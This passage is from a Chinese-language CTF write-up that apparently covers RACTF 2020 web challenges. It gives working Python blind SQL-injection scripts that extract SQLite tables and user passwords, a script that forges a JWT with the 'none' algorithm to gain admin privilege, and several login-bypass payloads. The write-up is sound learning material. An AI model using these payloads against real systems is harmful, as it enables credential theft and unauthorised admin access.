<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608220943.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608220943.png" class="lazyload" title></a></p>
<p>输入用户名a’or ‘1’–和密码123，看到有一个标志。那么就可以根据是否出现这个标志进行布尔盲注。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608221231.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608221231.png" class="lazyload" title></a></p>
<p>写脚本如下：</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token comment" spellcheck="true">#! -*- encoding:utf-8 -*-</span>
<span class="token keyword">import</span> requests
<span class="token keyword">import</span> string

<span class="token keyword">def</span> <span class="token function">request</span><span class="token punctuation">(</span>index<span class="token punctuation">,</span> compare<span class="token punctuation">,</span> chr_index<span class="token punctuation">)</span><span class="token punctuation">:</span>
    url <span class="token operator">=</span> <span class="token string">"http://95.216.233.106:33211/sign-in"</span>
    a<span class="token operator">=</span><span class="token string">"'or(select sqlite_version())--"</span>
    <span class="token comment" spellcheck="true">#1.数据库版本</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((select sqlite_version()),{0},1) {1} {2}) --"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#2.所有表名  users</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((SELECT name FROM sqlite_master WHERE type='table'),{0},1) {1} {2}) --"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#3.所有表结构(包含字段名，表名,</span>
    <span class="token comment" spellcheck="true"># create table users (username char, password char, privilege int)</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((SELECT sql FROM sqlite_master WHERE type='table'),{0},1) {1} {2}) --"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#4字段内容, 一次只能查一个字段</span>
    <span class="token comment" spellcheck="true"># username:Harry,John,Dave</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((SELECT group_concat(username) FROM users),{0},1) {1} {2}) --"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true"># password:P@ssw0rd123!s%dgyASD,cr1k3yth4ts4l0ngp4ss,p3rf3ct1nfr4structre</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((SELECT group_concat(password) FROM users),{0},1) {1} {2}) --"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true"># privilege:1,1,1</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((SELECT group_concat(privilege) FROM users),{0},1) {1} {2}) --"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    data<span class="token operator">=</span><span class="token punctuation">{</span>
        <span class="token string">'user'</span><span class="token punctuation">:</span> payload<span class="token punctuation">,</span>
        <span class="token string">'pass'</span><span class="token punctuation">:</span><span class="token string">'1'</span>
    <span class="token punctuation">}</span>
    r<span class="token operator">=</span>requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">,</span> data<span class="token operator">=</span>data<span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#print(r.text)</span>
    <span class="token keyword">if</span> <span class="token string">"Attempting"</span> <span class="token keyword">in</span> r<span class="token punctuation">.</span>text<span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token boolean">True</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token boolean">False</span>

res <span class="token operator">=</span> <span class="token string">""</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">500</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    left <span class="token operator">=</span> <span class="token number">32</span>
    right <span class="token operator">=</span> <span class="token number">127</span>
    <span class="token keyword">while</span><span class="token punctuation">(</span>left <span class="token operator"><=</span> right<span class="token punctuation">)</span><span class="token punctuation">:</span>
        mid <span class="token operator">=</span> <span class="token punctuation">(</span>left <span class="token operator">+</span> right<span class="token punctuation">)</span> <span class="token operator">>></span> <span class="token number">1</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>        <span class="token comment" spellcheck="true"># 防止连接过多报错，导致中断脚本</span>
            <span class="token keyword">if</span> request<span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">">"</span> <span class="token punctuation">,</span> mid<span class="token punctuation">)</span><span class="token punctuation">:</span>   
                left <span class="token operator">=</span> mid <span class="token operator">+</span> <span class="token number">1</span>
            <span class="token keyword">elif</span> request<span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">"<"</span> <span class="token punctuation">,</span> mid<span class="token punctuation">)</span><span class="token punctuation">:</span> 
                right <span class="token operator">=</span> mid <span class="token operator">-</span> <span class="token number">1</span>
            <span class="token keyword">elif</span> request<span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">"="</span> <span class="token punctuation">,</span> mid<span class="token punctuation">)</span><span class="token punctuation">:</span>
                res <span class="token operator">+=</span> chr<span class="token punctuation">(</span>mid<span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span>   
                <span class="token keyword">break</span>
        <span class="token keyword">except</span> requests<span class="token punctuation">.</span>exceptions<span class="token punctuation">.</span>ConnectionError<span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'Connection Error'</span><span class="token punctuation">)</span>
            <span class="token keyword">continue</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>选择任意一个对应的用户名和密码登录，得到flag。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608221814.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608221814.png" class="lazyload" title></a></p>
<h3 id="Getting-admin"><a href="#Getting-admin" class="headerlink" title="Getting admin"></a>Getting admin</h3><p>提示：See if you can get an admin account.</p>
<p>环境同上一题。让我得到管理员账户，但弄了半天，也不知道怎么搞。花了50点，看了hint如下。</p>
<p>Hint: Look into JWTs, specifically the <code>none</code> algorithm.</p>
<p>看来是jwt的问题，在这篇<a href="https://xz.aliyun.com/t/6776#toc-2" target="_blank" rel="noopener">博客</a>学习了一波jwt。再看提示，关键为空算法。看来是把算法改成空，就可以通过验证，是比较简单的一种攻击。</p>
<p>在Cookie中就可以看到格式类似于jwt的东西，两个小数点把数据分为三段非常明显。早该注意的，可惜之前碰到jwt的时候没好好学习。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609200820.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609200820.png" class="lazyload" title></a></p>
<p>把这部分jwt拿到<a href="https://jwt.io/" target="_blank" rel="noopener">jwt.io</a>上解密得到关键信息。</p>
<a href="https://gitee.com/crownz/blog_image/raw/master/20200609201028.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="undefined" class="fancybox"><img style="zoom:50%;" data-src="https://gitee.com/crownz/blog_image/raw/master/20200609201028.png" class="lazyload"></a>

<p>知道了payload，就可以构造信息生成payload。之前，我们盲注知道表单有privilege表段，并且所有账户的值都为1。猜测这个值是用来标识管理员的，在猜测各种数字之后，最终确定是2标识了管理员。</p>
<p>之后，用如下脚本生成让服务器不进行验证的jwt。</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">import</span> jwt    <span class="token comment" spellcheck="true">#pip装</span>
<span class="token comment" spellcheck="true"># 任选一用户，修改标识</span>
encode_jwt <span class="token operator">=</span> jwt<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">{</span><span class="token string">"user"</span><span class="token punctuation">:</span> <span class="token string">"Harry"</span><span class="token punctuation">,</span><span class="token string">"privilege"</span><span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">}</span><span class="token punctuation">,</span> None<span class="token punctuation">,</span> algorithm<span class="token operator">=</span><span class="token string">'none'</span><span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span>encode_jwt<span class="token punctuation">)</span>
<span class="token comment" spellcheck="true"># b'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VyIjoiSGFycnkiLCJwcml2aWxlZ2UiOjJ9.'</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>把cookie中的auth更改为生成的值，再去点击页面左下角的admin，得到flag。就这最后一步，我还弄了半天，因为一直在bp上弄的，最后才发觉是要点这个admin，orz。</p>
<a href="https://gitee.com/crownz/blog_image/raw/master/20200609201546.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="undefined" class="fancybox"><img style="zoom:50%;" data-src="https://gitee.com/crownz/blog_image/raw/master/20200609201546.png" class="lazyload"></a>

<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609201717.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609201717.png" class="lazyload" title></a></p>
<h3 id="Finding-server-information-未做出"><a href="#Finding-server-information-未做出" class="headerlink" title="Finding server information(未做出)"></a>Finding server information(未做出)</h3><p>提示：See if you can find the source, we think it’s called app.py</p>
<p>环境同上一题。仍然是看了半天没思路，去看了Hint。</p>
<p>Hint:That URL looks like it might be vulnerable to LFI… if only we could get around Nginx filtering ../</p>
<p>本地文件包含，过滤了路径穿越的关键符号，进行绕过就可以了。至于为什么是路径穿越，在我看到这个videos文件夹的时候，就应该想到的，还是没有题感。</p>
<a href="https://gitee.com/crownz/blog_image/raw/master/20200609202705.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="50" class="fancybox"><img alt="50" style="zoom:50%;" data-src="https://gitee.com/crownz/blog_image/raw/master/20200609202705.png" class="lazyload" title="50"></a>

<p>看到wp，有如下解释：</p>
<blockquote>
<p>Our goal is to find the app.py file somewhere within this application. So trying out some random values for /watch/[input] gives a server error. When we try /watch/app.py, we see that it does not give an error and that there is no video showing.</p>
</blockquote>
<p>所以尝试访问错误URL，获取服务器报错信息。但是在/watch/app.py这里，并没有报错。看下源码，就得到flag。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200610200538.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200610200538.png" class="lazyload" title></a></p>
<p>hint坑人啊，我还一直在向../被过滤这方面考虑，简直了。</p>
<h2 id="环境3"><a href="#环境3" class="headerlink" title="环境3"></a>环境3</h2><h3 id="Entrypoint"><a href="#Entrypoint" class="headerlink" title="Entrypoint"></a>Entrypoint</h3><p>提示：Sadly it looks like there wasn’t much to see in the python source. We suspect we may be able to login to the site using backup credentials, but we’re not sure where they might be. Encase the password you find in <code>ractf{...}</code> to get the flag.</p>
<p><strong>This challenge does NOT have fake flags.</strong> If you found some other flags while solving this challenge, you may have found the solutions to the next challenges first :P</p>
<p>这好像是一系列的题目都在一个环境上面，会找到多个flag，才有上面这个提示。</p>
<p>进入环境，看到一个python的登录界面，这个还是挺新奇的，不是php的。</p>
<a href="https://gitee.com/crownz/blog_image/raw/master/20200608081639.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="50" class="fancybox"><img alt="50" style="zoom:50%;" data-src="https://gitee.com/crownz/blog_image/raw/master/20200608081639.png" class="lazyload" title="50"></a>

<p>然后，查看页面源代码，看到一个提示backup.txt。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608081751.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608081751.png" class="lazyload" title></a></p>
<p>但是，直接访问它，发现禁止访问。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608082024.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608082024.png" class="lazyload" title></a></p>
<p>然后，就想去扫下目录。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608082155.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608082155.png" class="lazyload" title></a></p>
<p>去访问console，发现让我们输入PIN码，想到了flask的debug模式下的PIN码问题，可以根据信息去构造出PIN码。但这里应该还用不到。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608082404.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608082404.png" class="lazyload" title></a></p>
<p>访问robots.txt，看到几个disallow。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608082506.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608082506.png" class="lazyload" title></a></p>
<p>访问admin，wp-admin和admin.php，都显示没有资源。访问static，获取一些报错信息。根据报错信息能获取一些生成PIN码所需要的路径信息。</p>
<a href="https://gitee.com/crownz/blog_image/raw/master/20200608083652.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="50" class="fancybox"><img alt="50" style="zoom:50%;" data-src="https://gitee.com/crownz/blog_image/raw/master/20200608083652.png" class="lazyload" title="50"></a>

<p>访问sitemap.xml，看到sitemap.xml.bak。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608082533.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608082533.png" class="lazyload" title></a></p>
<p>访问sitemap.xml.bak，下载得到文件。打开后，看到_journal.txt。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608082742.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608082742.png" class="lazyload" title></a></p>
<p>访问_journal.txt，得到日志信息，还有一个flag。</p>
<a href="https://gitee.com/crownz/blog_image/raw/master/20200608082905.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="50" class="fancybox"><img alt="50" style="zoom:50%;" data-src="https://gitee.com/crownz/blog_image/raw/master/20200608082905.png" class="lazyload" title="50"></a>

<p>但提交flag之后，发现不是这一问的。</p>
<a href="https://gitee.com/crownz/blog_image/raw/master/20200608083039.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="50" class="fancybox"><img alt="50" style="zoom:50%;" data-src="https://gitee.com/crownz/blog_image/raw/master/20200608083039.png" class="lazyload" title="50"></a>

<p>最后，再看_journal.txt的第三段话，意识到这里的登录框存在注入点。输入admin’和123，就发现可以报错。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608162236.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608162236.png" class="lazyload" title></a></p>
<p>输入admin’or’1，登录成功。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608162152.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608162152.png" class="lazyload" title></a></p>
<p>根据这样的标志，在这篇<a href="http://p0desta.com/2018/03/29/SQL注入备忘录/#4-SQLite" target="_blank" rel="noopener">博客</a>学习了sqlite的相关语法，写出如下脚本，进行盲注。</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token comment" spellcheck="true">#! -*- encoding:utf-8 -*-</span>
<span class="token keyword">import</span> requests
<span class="token keyword">import</span> string

<span class="token keyword">def</span> <span class="token function">request</span><span class="token punctuation">(</span>index<span class="token punctuation">,</span> compare<span class="token punctuation">,</span> chr_index<span class="token punctuation">)</span><span class="token punctuation">:</span>
    url <span class="token operator">=</span> <span class="token string">"http://95.216.233.106:26143/"</span>
    <span class="token comment" spellcheck="true">#1.所有表名  users</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((SELECT name FROM sqlite_master WHERE type='table'),{0},1) {1} {2}) or '0"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#2.所有表结构(包含字段名，表名,</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((SELECT sql FROM sqlite_master WHERE type='table'),{0},1) {1} {2}) or '0"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#3字段内容, 一次只能查一个字段</span>
    <span class="token comment" spellcheck="true">#payload = "' or (substr((SELECT group_concat(username) FROM users),{0},1) {1} {2}) or '0".format(str(index), compare, ascii(chr(chr_index)))</span>
    <span class="token comment" spellcheck="true">#payload = "' or (substr((SELECT group_concat(password) FROM users),{0},1) {1} {2}) or '0".format(str(index), compare, ascii(chr(chr_index)))</span>
    payload <span class="token operator">=</span> <span class="token string">"' or (substr((SELECT password FROM users limit 2,1),{0},1) {1} {2}) or '0"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">,</span> compare<span class="token punctuation">,</span> ascii<span class="token punctuation">(</span>chr<span class="token punctuation">(</span>chr_index<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true"># 0,1,0,0,0,0,0,0</span>
    <span class="token comment" spellcheck="true">#payload = "' or (substr((SELECT group_concat(admin) FROM users),{0},1) {1} {2}) or '0".format(str(index), compare, ascii(chr(chr_index)))</span>
    <span class="token comment" spellcheck="true"># not authorized</span>
    <span class="token comment" spellcheck="true">#payload = "' or (substr((select load_extension('./backup.txt')),{0},1) {1} {2}) or '0".format(str(index), compare, ascii(chr(chr_index)))</span>

    data<span class="token operator">=</span><span class="token punctuation">{</span>
        <span class="token string">'username'</span><span class="token punctuation">:</span> payload<span class="token punctuation">,</span>
        <span class="token string">'password'</span><span class="token punctuation">:</span><span class="token string">'1'</span>
    <span class="token punctuation">}</span>
    r<span class="token operator">=</span>requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">,</span> data<span class="token operator">=</span>data<span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#print(r.text)</span>
    <span class="token keyword">if</span> <span class="token string">"xxslayer420"</span> <span class="token keyword">in</span> r<span class="token punctuation">.</span>text<span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token boolean">True</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token boolean">False</span>

res <span class="token operator">=</span> <span class="token string">""</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">500</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    left <span class="token operator">=</span> <span class="token number">32</span>
    right <span class="token operator">=</span> <span class="token number">127</span>
    <span class="token keyword">while</span><span class="token punctuation">(</span>left <span class="token operator"><=</span> right<span class="token punctuation">)</span><span class="token punctuation">:</span>
        mid <span class="token operator">=</span> <span class="token punctuation">(</span>left <span class="token operator">+</span> right<span class="token punctuation">)</span> <span class="token operator">>></span> <span class="token number">1</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>        <span class="token comment" spellcheck="true"># 防止连接过多报错，导致中断脚本</span>
            <span class="token keyword">if</span> request<span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">">"</span> <span class="token punctuation">,</span> mid<span class="token punctuation">)</span><span class="token punctuation">:</span>   <span class="token comment" spellcheck="true"># target < mid </span>
                left <span class="token operator">=</span> mid <span class="token operator">+</span> <span class="token number">1</span>
            <span class="token keyword">elif</span> request<span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">"<"</span> <span class="token punctuation">,</span> mid<span class="token punctuation">)</span><span class="token punctuation">:</span> 
                right <span class="token operator">=</span> mid <span class="token operator">-</span> <span class="token number">1</span>
            <span class="token keyword">elif</span> request<span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token string">"="</span> <span class="token punctuation">,</span> mid<span class="token punctuation">)</span><span class="token punctuation">:</span>
                res <span class="token operator">+=</span> chr<span class="token punctuation">(</span>mid<span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span> 
                <span class="token comment" spellcheck="true">#print(res.lower()) </span>
                <span class="token keyword">break</span>
        <span class="token keyword">except</span> requests<span class="token punctuation">.</span>exceptions<span class="token punctuation">.</span>ConnectionError<span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'Connection Error'</span><span class="token punctuation">)</span>
            <span class="token keyword">continue</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>得到表的结构如下：</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608183226.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608183226.png" class="lazyload" title></a></p>
<p>得到用户名如下，这里都是小写是因为之前的脚本都把它变小写了，后来意识到这样做是不对的，因为有的账户名是大写。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608190307.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608190307.png" class="lazyload" title></a></p>
<p>其他相应的东西，都可以由上面脚本爆出来，但没什么用。因为他对密码进行了sha256的加密（从表结构的第三列得知），我爆出来去解密也得不到结果。还有一个信息，就是第二个账户为管理员。</p>
<p>做了很多了的工作，最后还是再看了一遍题目的提示和_journal.txt中的一段话，才弄出来。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609085235.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609085235.png" class="lazyload" title></a></p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609085353.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609085353.png" class="lazyload" title></a></p>
<p>读了以上的信息，发现这里的关键还是哪个backup.txt文件，但是直接访问会报错，提示没有权限。直到我一一尝试，在static后面加上backup.txt，访问成功。得到develop的账户和密码，把密码裹起来，就是flag。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609085623.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609085623.png" class="lazyload" title></a></p>
<p>这个方式挺奇怪的，也不清楚是为什么，去搜索一下，得到如下答案：</p>
<blockquote>
<p>默认设置下，Flask 在程序根目录中名为 static 的子目录中寻找静态文件。如果需要，可在static 文件夹存放文件。服务器收到前面的 URL 后，会生成一个响应，包含文件系统中 <code>static/XXX</code>文件的内容。</p>
</blockquote>
<p>看来这个备份文件是在static中的，一访问就从服务器的static中寻找。这样的利用方式像是后门一样。</p>
<h3 id="Baiting"><a href="#Baiting" class="headerlink" title="Baiting"></a>Baiting</h3><p>提示：That user list had a user called <code>loginToGetFlag</code>. Well, what are you waiting for?</p>
<p>让我们登录获取flag，那么怎么以特定用户登录呢。构造用户名：loginToGetFlag’and’1’–和密码：123（任意），相当于把后面的密码给注释了，前面的查询为真，登录就得到flag。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609093140.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609093140.png" class="lazyload" title></a></p>
<p>这里是用and连接，同时把后面的东西给注释掉，导致这个用户名的查询语句为真，就登录成功。之前一直是用的or，这里的and还是试了一会儿的，要多思考这种逻辑才对。</p>
<h3 id="Admin-Attack-未做出"><a href="#Admin-Attack-未做出" class="headerlink" title="Admin Attack(未做出)"></a>Admin Attack(未做出)</h3><p>提示：Looks like we managed to get a list of users. That admin user looks particularly interesting, but we don’t have their password. Try and attack the login form and see if you can get anything.</p>
<p>在前面的Entrypoint登录之后，发现所有用户，就是我之前注入得到的。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609085756.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609085756.png" class="lazyload" title></a></p>
<p>题目让我们攻击登录表单，看看有什么信息。经过侧睡，发现他会报出的错误有两种语句类型。一种是选择加密算法，另一种是选择用户和密码对应的记录。个人猜测是，先选算法，对密码加密，然后再将加密密码传入第二个选择用户记录的语句，判断是否能登录。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609092112.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609092112.png" class="lazyload" title></a></p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200609092258.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200609092258.png" class="lazyload" title></a></p>
<p>我想根据盲注信息来登录，但事实是不行的，密码都是sha256加密，爆出来的东西只能确定数据库结构。</p>
<p>然后，看<a href>国内同仁</a>的wp，简单构造<code>username='or 1 limit 1,1--&password=123</code>，就能得出flag。limit 1,1等于说就是把第二条记录，也就是管理员那条记录给选出来了，这样就成功管理员登录。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200610201921.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200610201921.png" class="lazyload" title></a></p>
<h3 id="Vandalism-未做出"><a href="#Vandalism-未做出" class="headerlink" title="Vandalism(未做出)"></a>Vandalism(未做出)</h3><p>提示：That admin panel was awfully bare. There must be some other page, but we’ve no idea where it is. <em>Just to clarify, <code>ractf{;)}</code> is the greedy admins stealing all the flags, it’s not the actual flag.</em></p>
<p>说一定还有其它页面，然后在前面的管理员登录响应页面看到了一个东西。</p>
